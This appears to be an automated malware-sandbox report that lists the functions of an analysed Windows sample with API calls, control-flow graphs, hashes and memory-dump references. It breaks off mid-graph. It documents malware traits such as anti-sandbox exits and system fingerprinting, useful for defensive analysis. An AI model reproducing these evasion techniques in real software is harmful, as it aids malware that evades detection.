                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: a6c8c2da91ef4b5b6fd07d2eeacb2583acbe17470a75e045adb4d93b67b2c50a
                                • Instruction ID: b616f9315795230295ccb0a0bbe44f0f5e693889d942573d2d347e43a34259c1
                                • Opcode Fuzzy Hash: a6c8c2da91ef4b5b6fd07d2eeacb2583acbe17470a75e045adb4d93b67b2c50a
                                • Instruction Fuzzy Hash: 91E22870A05341CFD764EF29C494BAAB7E2FF8A314F58856ED48D8B352DB359841CB42
                                Function 006BF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(01326538), ref: 006BF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BF47B
                                • lstrcpy.KERNEL32(00000000,01326538), ref: 006BF4BB
                                • lstrcpy.KERNEL32(00000000,01339208), ref: 006BF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006BF61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006BF718
                                • lstrlen.KERNEL32(01339188), ref: 006BF746
                                • lstrcpy.KERNEL32(00000000,01339188), ref: 006BF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006BFA32
                                • lstrlen.KERNEL32(01339228), ref: 006BFA60
                                • lstrcpy.KERNEL32(00000000,01339228), ref: 006BFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: b81102f47d19557df8e31eb0598327eb4c988b63d0427c6a89049079105a25c9
                                • Instruction ID: ac9a0a4267507a617566feb1ec9a8c2dc9686c583e65484b2e253a02cac05952
                                • Opcode Fuzzy Hash: b81102f47d19557df8e31eb0598327eb4c988b63d0427c6a89049079105a25c9
                                • Instruction Fuzzy Hash: 48F12CB0A02212CFDB64DF29D854AD9B7E6BF44314B1981BED4499B372DB35DC82CB40
                                Function 006B8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2721 6b8ca0-6b8cc4 StrCmpCA 2722 6b8ccd-6b8ce6 2721->2722 2723 6b8cc6-6b8cc7 ExitProcess 2721->2723 2725 6b8cec-6b8cf1 2722->2725 2726 6b8ee2-6b8eef call 6a2a20 2722->2726 2728 6b8cf6-6b8cf9 2725->2728 2729 6b8cff 2728->2729 2730 6b8ec3-6b8edc 2728->2730 2732 6b8e88-6b8e9a lstrlen 2729->2732 2733 6b8e6f-6b8e7d StrCmpCA 2729->2733 2734 6b8d06-6b8d15 lstrlen 2729->2734 2735 6b8d84-6b8d92 StrCmpCA 2729->2735 2736 6b8da4-6b8db8 StrCmpCA 2729->2736 2737 6b8d5a-6b8d69 lstrlen 2729->2737 2738 6b8dbd-6b8dcb StrCmpCA 2729->2738 2739 6b8ddd-6b8deb StrCmpCA 2729->2739 2740 6b8dfd-6b8e0b StrCmpCA 2729->2740 2741 6b8e1d-6b8e2b StrCmpCA 2729->2741 2742 6b8e3d-6b8e4b StrCmpCA 2729->2742 2743 6b8d30-6b8d3f lstrlen 2729->2743 2744 6b8e56-6b8e64 StrCmpCA 2729->2744 2730->2726 2764 6b8cf3 2730->2764 2758 6b8e9c-6b8ea1 call 6a2a20 2732->2758 2759 6b8ea4-6b8eb0 call 6a2930 2732->2759 2733->2730 2757 6b8e7f-6b8e86 2733->2757 2753 6b8d1f-6b8d2b call 6a2930 2734->2753 2754 6b8d17-6b8d1c call 6a2a20 2734->2754 2735->2730 2748 6b8d98-6b8d9f 2735->2748 2736->2730 2745 6b8d6b-6b8d70 call 6a2a20 2737->2745 2746 6b8d73-6b8d7f call 6a2930 2737->2746 2738->2730 2749 6b8dd1-6b8dd8 2738->2749 2739->2730 2750 6b8df1-6b8df8 2739->2750 2740->2730 2751 6b8e11-6b8e18 2740->2751 2741->2730 2752 6b8e31-6b8e38 2741->2752 2742->2730 2755 6b8e4d-6b8e54 2742->2755 2760 6b8d49-6b8d55 call 6a2930 2743->2760 2761 6b8d41-6b8d46 call 6a2a20 2743->2761 2744->2730 2756 6b8e66-6b8e6d 2744->2756 2745->2746 2779 6b8eb3-6b8eb5 2746->2779 2748->2730 2749->2730 2750->2730 2751->2730 2752->2730 2753->2779 2754->2753 2755->2730 2756->2730 2757->2730 2758->2759 2759->2779 2760->2779 2761->2760 2764->2728 2779->2730 2780 6b8eb7-6b8eb9 2779->2780 2780->2730 2781 6b8ebb-6b8ebd lstrcpy 2780->2781 2781->2730
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 394a5bec928aef04a0c2eb92a570432e75a80da9744de295e701e5476f06159d
                                • Instruction ID: 2b4e288506fe686f32e5e00afc4961eb952efdea7e878aa699272794b9468966
                                • Opcode Fuzzy Hash: 394a5bec928aef04a0c2eb92a570432e75a80da9744de295e701e5476f06159d
                                • Instruction Fuzzy Hash: 05513EB1A09701EFC720AF65DD88AAB7BFABB54700B10481EE542D3611DF74D982CF61
                                Function 006C2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2782 6c2740-6c2783 GetWindowsDirectoryA 2783 6c278c-6c27ea GetVolumeInformationA 2782->2783 2784 6c2785 2782->2784 2785 6c27ec-6c27f2 2783->2785 2784->2783 2786 6c2809-6c2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 6c27f4-6c2807 2785->2787 2788 6c2826-6c2844 wsprintfA 2786->2788 2789 6c2822-6c2824 2786->2789 2787->2785 2790 6c285b-6c2872 call 6c71e0 2788->2790 2789->2790
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 006C277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,006B93B6,00000000,00000000,00000000,00000000), ref: 006C27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C2816
                                • wsprintfA.USER32 ref: 006C283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: 5e7956642729e4f8b73c8a025370551e44d6396021726c7dcc34e02a264ed51f
                                • Instruction ID: 599925670229f0b181b43bd1e15561811842acb42af225f4aaa90a7033d3f297
                                • Opcode Fuzzy Hash: 5e7956642729e4f8b73c8a025370551e44d6396021726c7dcc34e02a264ed51f
                                • Instruction Fuzzy Hash: 8E316FB190924A9FCB04DFB89985AEFBFBDFF58710F10416EE505F7650E6348A408BA1
                                Function 006A4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2793 6a4bc0-6a4bce 2794 6a4bd0-6a4bd5 2793->2794 2794->2794 2795 6a4bd7-6a4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 6a2a20 2794->2795
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 006A4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006A4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006A4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 006A4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 006A4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 83a68320fa4776db539a0a08259706918bbe6f8e327e43987da3082bdcbe4728
                                • Instruction ID: e29d6e4c95a5d8059917b8ff4295ddd03414599f32e9594dfb8679402de620e6
                                • Opcode Fuzzy Hash: 83a68320fa4776db539a0a08259706918bbe6f8e327e43987da3082bdcbe4728
                                • Instruction Fuzzy Hash: 25012D71D01218ABDB10DFA9EC45B9EBBB9EB49320F00416AF954E7390EF7459048FD4
                                Function 006A1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2798 6a1030-6a1055 GetCurrentProcess VirtualAllocExNuma 2799 6a105e-6a107b VirtualAlloc 2798->2799 2800 6a1057-6a1058 ExitProcess 2798->2800 2801 6a107d-6a1080 2799->2801 2802 6a1082-6a1088 2799->2802 2801->2802 2803 6a108a-6a10ab VirtualFree 2802->2803 2804 6a10b1-6a10b6 2802->2804 2803->2804
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006A1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 006A104D
                                • ExitProcess.KERNEL32 ref: 006A1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006A106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 006A10AB
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: a7b2313619f091deadb0f364a2297be69b7a06fd97f6dbd0d7fd007056677a3d
                                • Instruction ID: c944ead6afee72a502ee1a58eceedc8bca2de0b0ff26bf8038b5c281968315df
                                • Opcode Fuzzy Hash: a7b2313619f091deadb0f364a2297be69b7a06fd97f6dbd0d7fd007056677a3d
                                • Instruction Fuzzy Hash: 5901F471741204BBEB206B656C1AFAB77ADF796B11F208115F748E73C0DDB1ED008A64
                                Function 006BEE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2805 6bee90-6beeb5 call 6a2930 2808 6beec9-6beecd call 6a6c40 2805->2808 2809 6beeb7-6beebf 2805->2809 2812 6beed2-6beee8 StrCmpCA 2808->2812 2809->2808 2810 6beec1-6beec3 lstrcpy 2809->2810 2810->2808 2813 6beeea-6bef02 call 6a2a20 call 6a2930 2812->2813 2814 6bef11-6bef18 call 6a2a20 2812->2814 2824 6bef45-6befa0 call 6a2a20 * 10 2813->2824 2825 6bef04-6bef0c 2813->2825 2820 6bef20-6bef28 2814->2820 2820->2820 2822 6bef2a-6bef37 call 6a2930 2820->2822 2822->2824 2829 6bef39 2822->2829 2825->2824 2828 6bef0e-6bef0f 2825->2828 2831 6bef3e-6bef3f lstrcpy 2828->2831 2829->2831 2831->2824
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BEEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006BEEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006BEF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: cadcc5e7b4a3c4e8d8a47de5748ab3f7e76bb7ccacb37aba99f0c210da0fe181
                                • Instruction ID: 3f6b55e217c0e7b7b60228586dbbc7e5fa8da97756210d0fc4e99a1fa8a047a5
                                • Opcode Fuzzy Hash: cadcc5e7b4a3c4e8d8a47de5748ab3f7e76bb7ccacb37aba99f0c210da0fe181
                                • Instruction Fuzzy Hash: AA214FB07602069BCB61BF7EDC56AEA77A6AF11300F04446DB94ACB612EA31DC408F94
                                Function 006A10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2886 6a10c0-6a10cb 2887 6a10d0-6a10dc 2886->2887 2889 6a10de-6a10f3 GlobalMemoryStatusEx 2887->2889 2890 6a1112-6a1114 ExitProcess 2889->2890 2891 6a10f5-6a1106 2889->2891 2892 6a111a-6a111d 2891->2892 2893 6a1108 2891->2893 2893->2890 2894 6a110a-6a1110 2893->2894 2894->2890 2894->2892
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: d8791d8e12ad0215d7a0ab0c6cd68ed2ae5ce44809ca72d19952764623d7626f
                                • Instruction ID: 057426409896dfd78c87accd1f6aa9c56b6b4fd9854ed2ddd904b3be39a3ae49
                                • Opcode Fuzzy Hash: d8791d8e12ad0215d7a0ab0c6cd68ed2ae5ce44809ca72d19952764623d7626f
                                • Instruction Fuzzy Hash: 05F027701082448BEB107A64D80A32EF7DAEB13350F14092DDEDACA280E734CC408937
                                Function 006B8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2895 6b8c88-6b8cc4 StrCmpCA 2898 6b8ccd-6b8ce6 2895->2898 2899 6b8cc6-6b8cc7 ExitProcess 2895->2899 2901 6b8cec-6b8cf1 2898->2901 2902 6b8ee2-6b8eef call 6a2a20 2898->2902 2904 6b8cf6-6b8cf9 2901->2904 2905 6b8cff 2904->2905 2906 6b8ec3-6b8edc 2904->2906 2908 6b8e88-6b8e9a lstrlen 2905->2908 2909 6b8e6f-6b8e7d StrCmpCA 2905->2909 2910 6b8d06-6b8d15 lstrlen 2905->2910 2911 6b8d84-6b8d92 StrCmpCA 2905->2911 2912 6b8da4-6b8db8 StrCmpCA 2905->2912 2913 6b8d5a-6b8d69 lstrlen 2905->2913 2914 6b8dbd-6b8dcb StrCmpCA 2905->2914 2915 6b8ddd-6b8deb StrCmpCA 2905->2915 2916 6b8dfd-6b8e0b StrCmpCA 2905->2916 2917 6b8e1d-6b8e2b StrCmpCA 2905->2917 2918 6b8e3d-6b8e4b StrCmpCA 2905->2918 2919 6b8d30-6b8d3f lstrlen 2905->2919 2920 6b8e56-6b8e64 StrCmpCA 2905->2920 2906->2902 2940 6b8cf3 2906->2940 2934 6b8e9c-6b8ea1 call 6a2a20 2908->2934 2935 6b8ea4-6b8eb0 call 6a2930 2908->2935 2909->2906 2933 6b8e7f-6b8e86 2909->2933 2929 6b8d1f-6b8d2b call 6a2930 2910->2929 2930 6b8d17-6b8d1c call 6a2a20 2910->2930 2911->2906 2924 6b8d98-6b8d9f 2911->2924 2912->2906 2921 6b8d6b-6b8d70 call 6a2a20 2913->2921 2922 6b8d73-6b8d7f call 6a2930 2913->2922 2914->2906 2925 6b8dd1-6b8dd8 2914->2925 2915->2906 2926 6b8df1-6b8df8 2915->2926 2916->2906 2927 6b8e11-6b8e18 2916->2927 2917->2906 2928 6b8e31-6b8e38 2917->2928 2918->2906 2931 6b8e4d-6b8e54 2918->2931 2936 6b8d49-6b8d55 call 6a2930 2919->2936 2937 